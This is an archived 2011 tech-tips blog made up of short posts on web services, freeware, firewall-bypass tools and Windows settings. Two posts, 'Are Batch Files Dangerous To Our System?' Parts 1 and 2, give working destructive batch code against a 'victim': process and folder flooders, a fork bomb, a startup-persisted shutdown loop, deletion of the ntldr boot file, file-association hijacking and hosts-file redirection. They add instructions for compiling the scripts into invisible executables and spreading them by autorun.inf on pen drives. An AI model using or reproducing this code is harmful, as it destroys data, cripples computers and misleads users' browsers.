Saturday, April 30, 2011

Barcode Yourself : Website That Makes Individualized Barcode Information


The series of lines on virtually everything you can buy today is called as a UPC (Universal Product Code), more commonly known as The Barcode. The original barcode was patented in 1952 and started out as a combination of concentric circles rather than the lines of varying thickness that we recognize today.

The invention of the barcode is responsible for speeding up checkout lines and allowing for easier inventory management. No longer does a cashier have to search for the errant price tag to key in the amount manually.

Literally anything can be barcoded. Have you ever wondered what you're worth?


Barcode Yourself is a complete, interactive experience in the series of barcode art, created using the personalized data of participants. Enter an individual's gender, weight, height, age and location, and the barcode is formed using real-world data. The system assigns you a price value based on age, gender, location, height and weight, much like an insurance company would calculate risk assessment or longevity.

The individualized barcode can then be printed, mapped, scanned, even depicted on a t-shirt or coffee mug.

It is in scanning a barcode that the project reveals its humor, like a banner that reads: Disclaimer! Human beings are not merely worth somewhere between one cent and 10 dollars. With the complexity of mocking self-identity, Barcode Yourself lays out a fresh absurdity in the modern world of consumerism.

Visit Here To Barcode Yourself.

Source: barcodeart.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Friday, April 29, 2011

KeepMeOut : Website That Solves Your Internet Addiction.


I am very much addicted to YouTube, FaceBook, Twitter and blogs, well others may be addicted to many different sites of their interests. If you are a worker or an online entrepreneur, this can be an even bigger problem, because it will decrease your productivity and possibly your bottom line. You keep telling yourself you have to get started on your work instead of visiting these sites, but every time you sit down at your desk and open your laptop, you keep getting distracted.

How to solve the problem? I believe that the most efficient way is to stop, think, and try to become more disciplined over time. If that is not working, however, you can try KeepMeOut.com.

KeepMeOut creates custom, timed bookmarks that give it to you straight when you're visiting a site too frequently. What you need to do is just add the URL of the site that is consuming your time, and then the service will provide you with another URL that you should use to access the service (You should bookmark it and always use it). If you try to access the site more than once within a specific time interval, say 60 minutes, they service will block you and remind that you should wait some time before you can go there again.

Visit KeepMeOut Here

Source: KeepMeOut.com 

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Thursday, April 28, 2011

How To Bypass Network Firewall?

More and more employers and universities are becoming aware of the amount of time their employees or students are spending using the Internet for personal reasons. Obviously employers want to discourage this behavior and may implement a number of different ways to do so. These can include:
  • Restricting people from installing programs on their workstation. This usually won't stop someone from accessing websites, but it may keep people from playing games or using instant messaging software.

  • Using a firewall or proxy server to restrict access to websites or other Internet protocols. All your Internet communication passes through your network's firewall, so it's a great place to monitor and restrict access.

  • Using a network monitoring system to "spy" on Internet access. This is a form of firewall monitoring, where your employer can intercept and read/save anything flowing through their firewall.
Installing programs on workstations that monitor Internet access. This is probably the toughest thing to get around because there are so many different vendors that offer this type of software. In addition, there is software that simply records every keystroke you press. In most cases, there's no way around this other than disabling the software.

Today I am sharing with you some Free Tools to bypass firewalls and access blocked websites that will make sure that you get to visit those websites blocked by your country ISPs or network firewalls.

1. UltraSurf (Link)
UltraSurf is the flagship software product from UltraReach for Internet anti-censorship. It enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely. It enables users to browse any website freely just the same as using the regular browser while it automatically searches the highest speed proxy servers in the background.

2. GPass (Link)
Hide your IP address during web surfing. Support streaming audio/video, email, instant messaging, download managers, etc. Break through Internet blocking. Easy-to-use graphical user interface.

3. FreeGate (Link)
FreeGate is an anti-censorship client software for a secure and faster internet. Users access web sites overseas as fast as their local ones. It requires no installation or change in system setting. FreeGate works together with DynaWeb, a P2P-like proxy network system.

4. Garden GTunnel (Link)
GTunnel is a Windows application that works as a local HTTP or SOCKS proxy server. After setting proxy to GTunnel in web browser or other Internet applications, the traffic will go through GTunnel and our server farm before it reaches its original destination.

5. JAP (Link)
JAP makes it possible to surf the internet anonymously and unobservably. Instead of connecting directly to a webserver, users take a detour, connecting with encryption through several intermediaries, so-called Mixes. JAP uses a predetermined sequence for the mixes. Such a sequence of linked mixes is called a Mix Cascade. Users can choose between different mix cascades.

6. Your Freedom (Link)
Your Freedom services makes accessible what is unaccessible to you, and it hides your network address from those who don’t need to know. It turns your own PC into an uncensored, anonymous web proxy and an uncensored, anonymous SOCKS proxy that your applications can use, and it can even get you connected to the Internet just as if you were using an unrestricted DSL or cable connection.

7. Hopster (Link)
Hopster is all about open, safe and uncensored internet access. At home, schools, universities and offices worldwide, even in countries where Freedom of Speech is a political challenge. Hide your real IP address and protect yourself from nosy people and wannabe-hackers.

8. Freenet (Link)
Freenet is free software which lets you publish and obtain information on the Internet without fear of censorship. To achieve this freedom, the network is entirely decentralized and publishers and consumers of information are anonymous. Without anonymity there can never be true freedom of speech, and without decentralization the network will be vulnerable to attack.

9. Tor (Link)
Tor is a software project that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. Tor works with many of your existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol.

10. HotSpot Shield (Link)
HotSpot Shield creates a secure virtual private network (VPN) over your connection allowing you to bypass any ISP firewalls and lets you visit even those websites which are blocked by your ISP. It can also be used to visit those websites which are specifically meant for US users e.g. Pandora, Hulu etc.

Source : sizlopedia.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Tuesday, April 26, 2011

WinPing : An application That Ping and Test The Internet Connection

WinPing is a tool that has been designed to enhance the basic pinging capabilities of Windows. Among the additions are: Infinite looping pings, Multi-ping, adjustable number of retries, Displaying of information about hosts, and saving the ping results in a log file.


Enter a web address or a valid host name, e.g. http://www.google.com or google.com, or a valid IP address, e.g. 98.137.149.56 (IPv4) ,[2a00:1450:8006::93] (IPv6). The IP addresses are converted into host names and conversely. An empty input gives local IP address.

The button "Options..." opens the WinPing options: Infinite Loop (runs pings in a infinite loop and shows the average in real time), Time options (Timeout, Temporisation between every ping in milliseconds), Multiping (for several pings one after the other), Retries, Average of the response times, Hostname List, ip-to-country File... Sort and Replace utilities will allow you to edit and save host name list, countries list or any text file.

The "Auto-Save" option will allow you to save thousands of lines of pinging information (in Infinite Loop Mode).

A Ping Graph (with axis scale and Y-offset adjustment) allows you easily to view, in real time, Average and Pings points for every loop. You can easily save and load the Ping Curves using the Graph Options.

This version updates ping error messages, and updates IP address pinging. Now you can ping an IPv6 address, and you can show all resolved IP addresses of a domain name.

This program works with all version of Windows. If your system is Windows XP or older, it requires the Microsoft .NET Framework version 2.0 or higher.

Pros
A ping is essentially a utility that is already part of most OS including Windows, that can be used to detect connectivity. This is done by sending out a message to a remote host (IP address, or URL / alias) and hearing for a reply. This process is called pinging after the nautical term which describes a similar process of sending a ping and hearing for a reply.

Cons
It does little to add to the existing Ping application in Windows, except for adding a couple of options such as infinite pinging and logging of each ping. Neither of this is of much use for anyone, including hardcore networking people. Extra information about a host can be gotten from a WHOIS query. It is not at all clear why this information is required as part of the Ping reply. Basically, this tool will be useful for a person who is specifically interested in trying out various flavors of pinging and not for too many others. If the application had supplied a trace route feature or a link to a trace route server then it could possibly be much more interesting. But even then there are web based applications already available for that purpose. For basic network troubleshooting the in-built Windows ping application is more than sufficient. Thankfully, this is freeware, so enthusiasts can try and play around with it to their heart’s content. Users should be aware that there will be run-ins with their Firewall / Network Security suite when using pings, disable those before you can receive them.

Download WinPing from Here 

Source : patrice-zwenger.co.cc

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Monday, April 25, 2011

TwitFooter.com : Shows your latest tweets inside your email.

Email signatures allow you to passively offer your contact information, website and social profiles to anyone you communicate with via email. A Canadian-based startup has developed a Twitter tool called TwitFooter that displays tweets in the footer of your email signatures.

TwitFooter is a free web service that will allow you to add the latest tweets in your email signature. That means everytime you post new tweets, your Twitter status will automatically be updated in your email, even the ones already sent! TwitFooter does not use any javascript to update your tweets but instead generates a small image representing your last update.

What you have to do is to copy paste the code in you email signature. Go to the link given at the end of this post. Login with your twitter account. Allow the access to your account. Choose the option Copy (do not manually copy the code, sometimes it might not work) and then paste it in the signature.

If you’re a blogger or content creator this tool could be useful because TwitFooter will post your latest articles (through tweets) within every email you create. It also features statistics that track inbound clicks from emails. TwitFooter is a free tool that supports Hotmail, Gmail, Yahoo, Outlook Express, Windows Mail and Outlook 2003 & 2007.

Visit TwitFooter Here 

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Saturday, April 23, 2011

FlipTwits : A Website That Flips Text for Twitter


How to write upside down on Facebook, Twitter, Myspace, YouTube, Blogs, Forums. Type in your text and and just see the result with this website called "fliptwits.com". It's cool! It is specially designed for maintaining flip texts for tweeting. You can copy your flipped text and paste it anywhere you want. This text effect can be used almost anywhere.

To flip text simply enter it the first box. Your words will be flipped upside down in the second box. click on “Send Flip Tweet” button below. The service will ask you for the Twitter login (safe to provide). Enter the information and click Allow. Your tweet will be published on your account flipped upside down.

Visit The Website Here 

Source: FlipTwits.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Friday, April 22, 2011

PDFaid : A Website That Watermarks, Splits, Joins and Converts PDF Files


PdfAid.com is a Free service that provides a series of pdf tools to help you make amazing and useful changes to your pdf files Online. These tools donot require you to install any software on your computer. The interface is easy and intuitive to use. PDFaid can perform many things on our files like we can split a PDF file into many files, join the PDF files in one, watermark our PDF files with some text of our choice or convert a doc into the PDF format. It is a simple and single tool for most of your PDF requirements. 

Although the tool is not completely free but you can use the utility with some size restrictions on the site.

Visit pdfaid.com Here 

Source: pdfaid.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Thursday, April 21, 2011

Convert Doc : A Free Document Conversion Utility Tool


'Convert Doc' is a simple to use, yet sophisticated document conversion utility. If you need to convert/manipulate thousands of files with a variety of file types located within many folders in a short period of time, this is the tool.

'Convert Doc' can be especially useful if you require complicated file conversion jobs done on a regular basis. By saving and recalling a conversion job file, 'Convert Doc' quickly remembers all the file conversion tasks and their details. Also, 'Convert Doc' may be run from the command line allowing for use in batch files or can be launched from within other programs.

PDF, Text, RTF and HTML are amongst the favorite formats our customers convert their files to. With 'Convert Doc' you can use our conversion algorithms, or those built within MS Word itself giving you an extreme amount of flexibility.

Features:
  • Supports fast conversion of PDF, DOC, DOCX, RTF, HTML, TXT and more... MS Word NOT required. Acrobat NOT required.
  • Choose between using our own fast conversion or MS Words conversion algorithm.
  • Excellent PDF Conversion support. Convert PDF to DOC (MS Word), PDF to RTF, PDF to TXT, PDF to HTML, DOC to PDF, RTF to PDF, HTML to PDF etc. PDF and PDF/A-1b supported.
  • Schedule unattended conversion jobs at regular intervals (time or calendar based).
  • Move or delete the input files after processing
  • Save and restore complex conversion configurations
  • Special processing of files including Concatenation (appending), removing extra lines, launching 3rd party programs, search and replace strings.
  • Supports recursive subfolders
  • Can be adapted for all languages
  • Batch can be stopped midway and resumed at a later time.
  • Automate from the command line or with the COM/ActiveX interface

Download Convert Doc from Here 

Source: softinterface.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Wednesday, April 20, 2011

DriveLetterView : A Small Utility Tool That View/Change/Remove Drive Letters


DriveLetterView is a simple utility that allows you to view the list of all drive letter assignments in your system, including local drives, remote network drives, CD/DVD drives, and USB drives - even if they are not currently plugged. It also allows you to easily change a drive letter of USB devices and remote network shares, as well as to delete a drive letter of USB device that is not plugged. You can also use DriveLetterView to export the list of all drives into text/csv/html/xml file.

This utility works on every version of Windows, starting from Windows 2000 and up to Windows 7/2008. Both 32-bit and x64 systems are supported.

After you run DriveLetterView, the list of all assigned drive letters is displayed on the main window of DriveLetterView.
If you want to change the drive letter of USB device or remote network drive, simply select the desired drive letter and use the 'Change Drive Letter' option (F9). If you want to remove assigned drive letters of USB devices that you don't use anymore, you can select the desired drive letter, and choose the 'Delete Selected Drive Letter' option.

Be aware that DriveLetterView doesn't allow to change or remove a drive letter of a local hard-drive. Also, you cannot change existing drive to a drive letter that is already assigned to another device.

If you change a drive letter of USB flash drive that is not currently plugged, this flash drive will get the drive letter that you choose on the next time that you plug it.

Download  DriveLetterView from Here

Source: nirsoft.net

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Tuesday, April 19, 2011

Voxli - A Free Website For Voice Chat

  
If you are looking for online voice chat without wanting to share your skype or Gmail ID, then Voxli is quite perfect.

Features:
  • Voxli is the easiest way to voice conference online.
  • Voice chat with up to 200 people at a time.
  • Never leave the browser - no large download, no server setup.
  • Invite your friends by sending them the URL of your voice conference through email or instant messenger.
  • Use push to talk to control when you are speaking even if you are outside the browser.
  • Voxli is free for all group sizes during open beta.
  • Compatible with Windows and Mac.
  • Voxli is compatible with all gaming headsets.
Note: If you install the voxli browser plugin, you get HQ (high quality) audio.

Source: voxli.com

Visit the site Here 

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Monday, April 18, 2011

How To Generate Terms of Service and Privacy Policy for your Website??


What is Terms of service?
Terms of service (commonly abbreviated as ToS or TOS) are rules which one must agree to abide by in order to use a service. Unless in violation of consumer protection laws, such terms are usually legally binding. Terms of Service can also be referred to as Terms of Use or sometimes merely a Disclaimer, especially regarding the use of websites.

Certain websites are noted for having carefully designed terms of service, particularly eBay and PayPal, which need to maintain a high level of community trust because of transactions involving money. Terms of service can cover a range of issues, including acceptable user behavior online, a company's marketing policies, and copyright notices. Some organizations, such as Yahoo!, can change their terms of service without notice to the user base.

A ToS violation can result in myriad consequences towards those who are guilty depending on the service and the severity of the violation. Most organizations reserve the right to restrict a user's access to the service if they violate the terms in the agreement. In more serious cases, the user will have his or her account terminated.

What is Privacy policy?
A privacy policy is a legal document that discloses some or all of the ways a party gathers, uses, discloses and manages a customer's data. The exact contents of a privacy policy will depend upon the applicable law and may need to address the requirements of multiple countries or jurisdictions. While there is no universal guidance for the content of specific privacy policies, a number of organizations provide example forms or online wizards.

So what do you do if you have just started out as an entrepreneur of your website and want a ToS/PP of your own? I checked onto links on Google which gave me what I really wanted. A Terms of Service Generator! Some of the links have been provided here, Check them out.







There are many more...you can search them in GOOGLE.  

Source: en.wikipedia.org 

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Sunday, April 10, 2011

Part 2 : Are Batch Files Dangerous To Our System?

Hi all once again welcome back to my blog....we were discussing on the effect of batch file in our system and were looking after some batch codes...let's continue..


4. Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

5. Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”

These two commands will copy the batchfile in start up folders (in XP)

shutdown -s -t 00
This will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Sta rt Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

6. Deleting boot files

Goto C drive in Win XP , Tools->Folder Option->View.
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'.
Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

7. Extension Changer

@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a file type like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.

Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint, games, command prompt and many more), jpeg, png, mpeg files wouldn’t open properly.

8. DNS Poisoning

There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.

Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he would try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.

You can download the software "Bat To Exe Converter".

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive:

Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Source: Elakiri.com 

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Saturday, April 9, 2011

Part 1 : Are Batch Files Dangerous To Our System?

What is a Batch File?
In DOS, OS/2, and Microsoft Windows, a batch file is a text file containing a series of commands intended to be executed by the command interpreter. Similar to job control language and other systems on mainframe and minicomputer systems, batch files were added to ease the work required for certain regular tasks by allowing the user to set up a batch script to automate many commands. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands, normally line-by-line. Batch files are useful for running a sequence of executables automatically and are often used to automate repetitive or tedious processes.

DOS batch files have the filename extension .bat. Batch files for other environments may have different extensions, e.g. .cmd or .bat in the Microsoft Windows NT-family of operating systems and OS/2, or .btm in 4DOS and 4NT related shells.

What Can Batch File Do?
They can be used to delete the windows files, format data, steal information, irritate victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy registry and for many more purposes.

Some Simple Codes Worth Trying:
Just copy the code to notepad and save it as givenameurself.bat (You can give any name you wish but extension must be "bat" and save it as 'all files' instead of text files).

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint, notepad, command prompt repeatedly, irritating victim and of course affecting performance.

2. Folder flooder

@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

3. User account flooder 

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

To be continued......

Source: en.wikipedia.org and elakiri.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Friday, April 8, 2011

How To Block Any Website Without Using Any Software?

Yes,that's true. You can block any website in windows without using any software. Just follow these steps:

1.Browse for C:\Windows\system32\drivers\etc.

Alternatively, Open “Run” from the start menu (or press WinKey + r). Just copy paste the following path and hit ENTER. notepad %windir%\system32\drivers\etc\hosts

2.Search for the file named "hosts" and open it in notepad.

3.Then you will see a line "127.0.0.1 localhost".

4.Just under this line add "127.0.0.2 www.sitenameuwanttoblock.com" without quotes and Change the www.sitenameuwanttoblock.com url with the site's url you want to block and you are done!!

For Example:-
127.0.0.2 www.facebook.com

5. Make sure every time you add another website, the last digit of the address 127.0.0.x should not be the same.

For Example:-
127.0.0.3 www.orkut.com

6. Save the file and exit. Restart your browser if it is opened and changes will take place immediately.

Note:
You may need to add sites with both with and without the "www.". Test after blocking to make sure you got it right.

You can add as many undesirable and dangerous sites as you wish to block in this fashion in your personal HOSTS file!

Some people suggest that you add a website address that you wish to block by adding it to Internet Explorer's Restricted Zone. This does NOT totally block a site. It will only RESTRICT a site from certain actions such as using javascript, Active-X and Java etc.

Some people also suggest that you add a website address to the Internet Explorer 'Privacy' settings. This does not block a site. It only stops that site from using cookies.

Source: elakiri.com 

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Thursday, April 7, 2011

How to edit/change each and every text/items in every webpage?

Have you ever tried to do this stuff...like changing text, images, links etc from the well known websites??? Can you do this?? Of course I can help you guys to make this happen. But what you can't do is save that webpage after modifying it.

Ok, let's start the trick. See the original Facebook page of mine.....and then the edited one...


                                                                            Original


                                                                             Edited 

1. Go to any website

2. Paste the below code in the address bar of your browser

Code:


3. You can edit the website , but you cannot save it

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Wednesday, April 6, 2011

How To Reveal Asterisk (******) Passwords?


If you want to reveal the passwords hidden behind Asterisk (****) follow the steps given below:

1) Open the Login Page of any website. (eg. http://www.gmail.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below in your browser's address bar and press 'Enter'.


Above script is tested on orkut, gmail, hotmail, rediff login pages! Some login pages have frames so the above may fail! In fireox you can also right-click on any frame and can open that frame separately in different window or tab and then can use any of above script!

Note: Try this code also.


Above script will display the passwords of all masked fields including password values in a dialog box. Have problem detecting actual text in fields on IFRAME pages though.

4. As soon as you press 'Enter', This will open an alert message revealing the password in cleartype.

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Tuesday, April 5, 2011

How To Automatically Log On To Windows XP Upon Startup?

Would you rather not have to log on after your computer starts? If you’re the only person who uses your computer, you can make life a little easier by skipping the Welcome screen completely and having Microsoft Windows XP take you straight to your desktop.

Follow these Steps:
1.Click Start, and then click Run.


Note: Remember your user name at the top of the Start menu, because you’ll need it later.

2.In the Open box, type control userpasswords2 and click OK.


3.Clear the Users must enter a user name and password to use this computer check box. Click OK.


4.Click the User name box, type the user name that was displayed on the Start menu in step 1. If you normally type a password to log on, type your password in both the Password and Confirm Password boxes. Otherwise, leave these boxes blank. Click OK.


Auto logon now allows anyone to start and use your computer without typing a password.

Note: Keep in mind that you should not enable auto logon if you need privacy for any files on your computer.

Source: microsoft.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Monday, April 4, 2011

How To Increase Virtual Memory In Windows XP?

Virtual memory is simulated RAM. When you have used up all your RAM, your computer will shift data to an empty space on the hard drive. The computer swaps data to the hard disk and back to your RAM as needed. When you increase your virtual memory you are increasing the empty space that is reserved for your RAM overflow.

Also having enough available space is absolutely necessary for your virtual memory and RAM to function properly.

How To change the size of the virtual memory paging file?
You must be logged on as an administrator or a member of the Administrators group in order to complete this procedure. If your computer is connected to a network, network policy settings may also prevent you from completing this procedure.

1.Open System in Control Panel.

2.On the Advanced tab, under Performance, click Settings.

3.On the Advanced tab, under Virtual memory, click Change.

4.Under Drive [Volume Label], click the drive that contains the paging file you want to change.

5.Under Paging file size for selected drive, click Custom size, and type a new paging file size in megabytes in the Initial size (MB) or Maximum size (MB) box, and then click Set.

If you decrease the size of either the initial or maximum page file settings, you must restart your computer to see the effects of those changes. Increases typically do not require a restart.

Note:

To open System, click Start, click Control Panel, click Performance and Maintenance, and then click System.

To have Windows choose the best paging file size, click System managed size.

For best performance, do not set the initial size to less than the minimum recommended size under Total paging file size for all drives. The recommended size is equivalent to 1.5 times the amount of RAM on your system. Usually, you should leave the paging file at its recommended size, although you might increase its size if you routinely use programs that require a lot of memory.

To delete a paging file, set both initial size and maximum size to zero, or click No paging file. Microsoft strongly recommends that you do not disable or delete the paging file.

Source: microsoft.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Sunday, April 3, 2011

SysTools PDF Unlocker : An Application That Remove Copying, Printing, Page Extraction Restrictions From PDF Files

PDF Passwords are extremely useful as we can cease the access of crucial data from unwanted users so that they cannot make any modifications in the original data. PDF password protected files are safe and prevent unwanted user to perform functions like editing, printing, copying etc. in the original content. Passwords protecting your PDF files will restrict other people from opening these files and gaining access to your valuable data. You are secured that PDF files cannot be printed, copied or altered by undesirable users.

If you are owner of a document and unable to recall what your password is, then it can lead to serious problem like you cannot open PDF files and are unable to carry out important task. If you are a user and need to carry out important task how would you do in absence of PDF password?

Now, you want to open PDF files, so that you can carry out important task. For this you need to take some professional help in the form of third-party software tool.


You can use SysTools PDF Unlocker software to open PDF documents in acrobat. Using this software you can again carry out important work task which you were unable to do due to locked PDF files. Once PDF unlocks the PDF file, you easily perform the editing function on it. So, in a way, this software works as PDF documents editor for you. The software will help you to break PDF password and to perform functions like edit, copy, extract and print.

Download SysTools PDF Unlocker from Here 

Source: pdf-unlocker.com

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Saturday, April 2, 2011

FileSeek : A Tool That Search Text Inside Any File.


 Have you ever needed to find a file buried somewhere in your computer? Have you ever needed to find a specific string of text inside a file? FileSeek can do that, and more. 

FileSeek is lightning fast, small and super easy to use. It can even be integrated right into the Windows Explorer right-click menu to provide quick and easy access. FileSeek doesn’t use background indexing, so when FileSeek is closed your computer’s performance won’t be affected.

FileSeek enables you to search your computer for files that match a specified keyword or string. The program not only searches for matching file names but also scans the content of the files and provides an excerpt of the text containing the keyword. You can use simple keyword searches as well as Regular Expression queries and limit the results to certain folders or file types. FileSeek can optionally be integrated with the Windows Explorer right-click menu for files and folders. The program does not use any background indexing which makes it a little slower than others but does not require it to be running, unless you actually use it.

Features:
  • Search for text string matches inside any kind of file
  • Match Regular Expressions inside any kind of file
  • Search a folder and all of its sub-folders
  • Match 1 or more file patterns, like *.jpg, file?.txt or anything else you can imagine
  • Exclude 1 or more file patterns from your search, like *.exe or *.dll
  • Filter results by the last modified date
  • Never indexes files in the background
  • Completely Free!
Download Fileseek from Here 

Source: fileseek.ca

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Friday, April 1, 2011

Exposed Truth : Was ICC WC 2011 Semi final between India Vs Pakistan cricket Match Fixed??


Cricket has had a number of controversies relating to players being involved with the betting aspects of the game. In particular, numerous players have been approached by bookmakers and bribed to, throw matches, aspects of matches (e.g. the toss) or provide other information.

